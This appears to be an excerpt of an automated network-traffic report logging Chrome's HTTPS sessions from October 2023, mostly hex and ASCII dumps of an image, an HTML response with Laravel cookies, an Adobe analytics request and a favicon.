                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1795INData Raw: ba 50 86 b8 19 58 7a 98 b9 92 54 5e 8b 00 ef 26 76 b8 ce 24 ff 35 a5 69 71 3b 71 83 bb 2a 05 06 23 88 36 d2 d9 e3 d6 4e 7c b1 27 23 51 5d 2b 00 5f c5 e2 ad 22 62 00 b8 10 d8 b9 ad 19 a8 bf d1 c0 3d e4 cf 8f 51 fe 98 4a dc 78 3f 86 38 c7 dc ef 14 ea b5 c5 80 8f 03 8f 90 ff fc 2f 73 3c 43 14 bc 74 b3 83 7e 19 ea f1 59 e3 31 60 c9 2e c6 a1 0e de 4a 14 d7 65 cf 45 99 e3 7a e2 38 87 6e 9d 55 82 c7 52 44 6c 57 c0 58 54 d9 5a c0 8f b0 90 63 61 31 11 f8 0c ed 77 77 7a a1 77 96 e0 b1 14 11 c7 75 39 0e 55 f7 53 f2 e7 a0 2e f1 8d 36 c7 5e 2a cc 67 c9 bf 00 0c d8 6d b8 89 92 fa e4 24 f2 af 87 a6 c7 58 60 dd e1 26 4a 52 65 ac 06 fc 37 70 2b f9 af 2f 75 8e 27 89 9d 39 db 52 cd c2 d8 f5 88 d7 ff ec 71 6c 25 2e a0 9c 47 d1 94 c1 62 c0 81 c0 0d e4 cf 53 d5 62 32 71 93 69
                                                                                                                                                                                                                                                                                                              Data Ascii: PXzT^&v$5iq;q*#6N|'#Q]+_"b=QJx?8/s<Ct~Y1`.JeEz8nURDlWXTZca1wwzwu9US.6^*gm$X`&JRe7p+/u'9Rql%.GbSb2qi
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1796INData Raw: 3e e3 be 15 78 0b f1 fe 57 e6 82 bf 99 c0 d5 c0 5f 88 ae 52 77 e6 a6 a3 86 da 80 b8 66 de 4a 74 92 28 f3 f7 c2 99 c0 55 44 c1 f2 19 c0 7d b9 e9 a8 a1 96 03 76 62 ee 7b cd 3a a9 d9 0c ef 01 a2 33 cd 9f 89 02 94 59 a9 d9 48 ad 5b 89 b8 07 50 e6 cf 72 ed b8 92 58 b3 51 1f b8 30 d9 ba cf 02 df c9 4e a2 c1 8e 00 be 91 9d 84 1a 63 04 f1 66 f4 fa ec 44 1a ea 69 e2 86 95 5f 62 25 b5 63 04 d1 f2 75 23 60 e3 79 62 43 ca d7 06 16 e2 86 c3 c3 c0 bd 44 b1 c6 18 e0 16 e0 36 e2 9c 52 49 cf b7 08 b0 19 f1 19 61 eb a1 9f 6f 30 f4 fb 65 f1 18 70 2b 71 0c e4 d5 c4 cd f9 7e b6 f2 95 24 d5 cf 32 c4 bd 89 6d 89 c2 c6 ad c8 3d cb 7e 12 d1 4d ea 72 a2 43 dc 15 44 e7 62 a9 2c 46 13 9f 13 b7 63 6e b1 ff ba 89 f9 4c 25 be e7 5d 4e 74 9a bd 1c 8f 0a 53 f9 cc 39 7a 6a ce 7b cd a6 c0
                                                                                                                                                                                                                                                                                                              Data Ascii: >xW_RwfJt(UD}vb{:3YH[PrXQ0NcfDi_b%cu#`ybCD6RIao0ep+q~$2m=~MrCDb,FcnL%]NtS9zj{
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1797INData Raw: 62 c0 05 e4 5f 64 4d 8a bb 81 95 5a 99 1c 35 d2 ce 44 b7 96 ec e7 69 53 62 36 70 40 4b 33 23 49 92 24 49 92 24 49 92 54 3d 2f 23 36 b3 66 af c9 14 15 03 c0 5a 85 8e 90 54 32 4b 02 97 90 7f b1 35 29 2e 05 16 6d 61 6e d4 2c 1b 02 cf 92 ff fc 6c 4a 0c 60 85 a6 24 49 92 24 49 92 24 49 aa b7 ef 93 bf 26 53 64 dc 54 ec f0 48 e5 b4 14 f0 0f f2 2f b8 26 c5 ff 01 23 5a 98 1b 35 c3 2a 44 77 96 ec e7 65 53 62 36 70 68 4b 33 23 49 92 24 49 92 24 49 92 54 4d 2b 03 13 c9 5f 97 29 32 be 51 e8 08 49 25 b6 24 70 21 f9 17 5d 93 e2 07 2d cd 8c ea 6e 79 e0 3a f2 9f 8f 4d 89 01 e0 23 2d cd 8c 24 49 92 24 49 92 24 49 52 75 fd 80 fc 75 99 a2 63 bb 42 47 48 6d b3 43 41 7f 2d 01 9c 09 bc 25 3b 91 06 f9 36 70 78 76 12 4a b3 2c 70 11 b0 65 76 22 0d 31 1b 38 08 f8 75 76 22 92 24 49
                                                                                                                                                                                                                                                                                                              Data Ascii: b_dMZ5DiSb6p@K3#I$I$IT=/#6fZT2K5).man,lJ`$I$I$I&SdTH/&#Z5*DweSb6phK3#I$I$ITM+_)2QI%$p!]-ny:M#-$I$I$IRuucBGHmCA-%;6pxvJ,pev"18uv"$I
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1799INData Raw: d4 f8 5f 60 d4 30 f3 24 49 92 24 49 92 24 49 92 9a ed cf e4 af 69 18 dd c5 78 62 6d 4e 52 0f 2c 0b fc 85 fc 0b bd c9 71 0f 71 ac cd a2 c3 cc 95 e6 b7 1a f0 2d 60 02 f9 f3 d8 d4 98 0e 1c 34 dc 44 49 92 24 49 92 24 49 92 a4 c6 f3 e8 94 7a c4 d1 2f 9c 58 49 c5 1a 05 7c 87 fc 8b bd e9 f1 30 f0 49 60 a9 85 4f 97 80 b5 81 1f 02 53 c8 9f b7 26 c7 53 c0 f6 c3 cc 95 24 49 92 24 49 92 24 49 d2 ea c0 58 f2 d7 36 8c ee e2 51 60 19 24 f5 c5 3e c0 24 f2 2f fc a6 c7 78 e0 44 e0 b5 0b 9f ae c6 19 09 ec 0c 9c 06 cc 24 7f 9e 9a 1e 37 00 eb 2e 74 c6 24 49 92 24 49 92 24 49 92 c2 9f c8 5f db 30 ba 8f 7d 5f 38 b1 92 7a 6b 43 e0 76 f2 2f 7e 23 e2 3a e0 10 60 e9 85 4d 5a cd ad 01 1c 0e 3c 40 fe 7c 18 11 27 03 4b 2c 64 ce 24 49 92 24 49 92 24 49 92 e6 d8 9f fc b5 0d a3 fb b8 1c
                                                                                                                                                                                                                                                                                                              Data Ascii: _`0$I$I$IixbmNR,qq-`4DI$I$Iz/XI|0I`OS&S$I$I$IX6Q`$>$/xD$7.t$I$I$I_0}_8zkCv/~#:`MZ<@|'K,d$I$I$I
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1800INData Raw: 92 24 49 92 24 49 92 24 a9 5a 46 01 1f c3 75 c1 5e c7 00 f0 3d e2 08 1b 49 ea c8 8a c0 b1 c0 74 f2 5f d4 0c a3 8c f1 08 70 08 1e 97 22 49 92 24 49 92 24 49 92 aa 6d 45 e0 78 a2 e3 78 f6 fa 4b dd e2 09 e0 1d ad 4f 85 24 2d dc 46 c0 79 e4 bf b8 19 46 59 62 22 70 04 b0 04 92 24 49 92 24 49 92 24 49 f5 b1 2d 70 2d f9 6b 31 75 88 19 44 d7 8d e5 da 9a 01 49 6a d1 4e c4 b9 4c d9 2f 76 86 91 15 b3 81 93 81 97 20 49 92 24 49 92 24 49 92 54 5f 3b 03 37 92 bf 36 53 d5 b8 08 d8 b8 ed 51 97 a4 36 8d 02 3e 0c 3c 4c fe 0b 9f 61 f4 33 ce 05 36 43 92 24 49 92 24 49 92 24 a9 19 46 02 fb 03 77 93 bf 4e 53 95 b8 03 d8 b5 93 c1 96 a4 6e 2c 0e 7c 06 78 8a fc 17 42 c3 e8 65 5c 0a 6c 87 24 49 92 24 49 92 24 49 52 33 8d 06 de 0f 5c 46 fe ba 4d 59 e3 7a 60 4f 62 33 bc 24 a5 59 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: $I$I$ZFu^=It_p"I$I$ImExxKO$-FyFYb"p$I$I$I-p-k1uDIjNL/v I$I$IT_;76SQ6><La36C$I$I$FwNSn,|xBe\l$I$I$IR3\FMYz`Ob3$Y
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1801INData Raw: 92 24 49 92 f4 02 ff 1f be 6e 82 78 b2 5b dc 69 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                              Data Ascii: $Inx[iIENDB`


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              159104.21.0.95443192.168.2.1649839C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1801INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:18 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Powered-By: PHP/8.1.10
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2nnhBrYL%2FI%2BQRjt%2B8G45t9gP64JcG5kxmrTj0VDN2B7H1%2B3pm8I%2BsbHlLwcdcHunbkZiF%2F3p%2F7q57P0UPyLOKvOoJplRgn2X4NlI8pufVUE90YNTkjgODBQgJ7XVnn82nmnZOZsaE%2Fws8uk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IlNabzlWaXBPWHhJdEJFZlZTRHJqMlE9PSIsInZhbHVlIjoiV1cxbGEwNUNrR0RxQXBMa0FOTXNCSmExLzg5K0VGbGluR0JzNDhrZy9hWld3UW9OWGloaG8xSWJXMWFKSllnNWZiRHBtZFJTRE9OcU0rYVJCTDJyTHQ3MmdDaEk4OUU4UXdWRUlMN2lYMVZnSTJ0SGhSeVN1RkpnVTJPZW9kS0EiLCJtYWMiOiI4ZWY0MDllNWI3NzRiOTg1MjE3NTgxOTZlM2E4YzZjY2YwMGRjMWJhYmM2MWMyZGMzNTk5MGQzMmU2NjQ3MzAwIiwidGFnIjoiIn0%3D; expires=Wed, 25-Oct-2023 18:29:18 GMT; Max-Age=7200; path=/; samesite=lax
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1802INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 63 72 4e 55 78 49 4f 47 4e 53 62 33 6b 77 57 58 6b 77 61 54 4a 76 65 6e 64 4b 63 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 46 46 59 53 7a 4a 45 4e 44 59 77 53 47 74 6b 4f 54 6c 42 52 44 41 31 55 7a 42 48 5a 58 70 6d 65 57 70 76 62 6c 67 33 52 45 52 6c 5a 58 4a 46 64 47 70 4b 62 6d 64 48 63 30 34 35 61 54 52 6f 52 7a 4e 4d 61 45 51 77 4b 30 4a 70 53 6c 4d 77 54 46 42 34 63 31 5a 59 62 6d 4a 79 53 32 39 5a 51 55 52 46 63 57 49 77 52 47 64 46 53 47 77 35 56 48 6c 69 55 45 70 72 54 56 4a 58 54 31 5a 47 5a 47 70 57 4b 31 6c 42 4d 6b 6c 74 59 31 46 73 52 48 70 69 63 32 64 42 53 47 51 35 54 33 64 56 4d 6b 70 50 64 32 64 6f 4d 47 34
                                                                                                                                                                                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImcrNUxIOGNSb3kwWXkwaTJvendKc0E9PSIsInZhbHVlIjoicFFYSzJENDYwSGtkOTlBRDA1UzBHZXpmeWpvblg3RERlZXJFdGpKbmdHc045aTRoRzNMaEQwK0JpSlMwTFB4c1ZYbmJyS29ZQURFcWIwRGdFSGw5VHliUEprTVJXT1ZGZGpWK1lBMkltY1FsRHpic2dBSGQ5T3dVMkpPd2doMG4
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1803INData Raw: 33 0d 0a 34 30 34 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 3404
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1803INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              16192.168.2.164975263.140.38.180443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC517OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52294029732250?AQB=1&pccr=true&vidn=329CA0F3A19B75CA-60000BAF437DAE53&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A18%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: sat_domain=A; s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              160104.21.0.95443192.168.2.1649840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1803INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:19 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/x-icon
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 19 Mar 2023 15:20:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: W/"4316-5f7425905ae40"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CFtQNOkbVbpXv%2FYVAxvMOTTpEOXOTV06Ya86ArLC0bM%2BQHGaViVGYhdnrExY1MH3lGyZZ3NfYVXW3VZ9Wn%2Bi28v%2Fl6skStWsQwmGCb5iC%2FdHaSwuyiWFU1AWNC4Q9nRp3ehGVinyD92iAHE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd66789069c55-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1804INData Raw: 34 33 31 36 0d 0a 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33
                                                                                                                                                                                                                                                                                                              Data Ascii: 4316h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1804INData Raw: 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
                                                                                                                                                                                                                                                                                                              Data Ascii: """ 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1806INData Raw: 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                                                                                                                                                                                                              Data Ascii: 333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 33333333333333333
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1807INData Raw: 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22
                                                                                                                                                                                                                                                                                                              Data Ascii: """"""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333""""""""""""
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1808INData Raw: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44
                                                                                                                                                                                                                                                                                                              Data Ascii: DDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1810INData Raw: 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
                                                                                                                                                                                                                                                                                                              Data Ascii: DUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1811INData Raw: 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55
                                                                                                                                                                                                                                                                                                              Data Ascii: UUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUU
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:19 UTC1812INData Raw: 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                              Data Ascii:
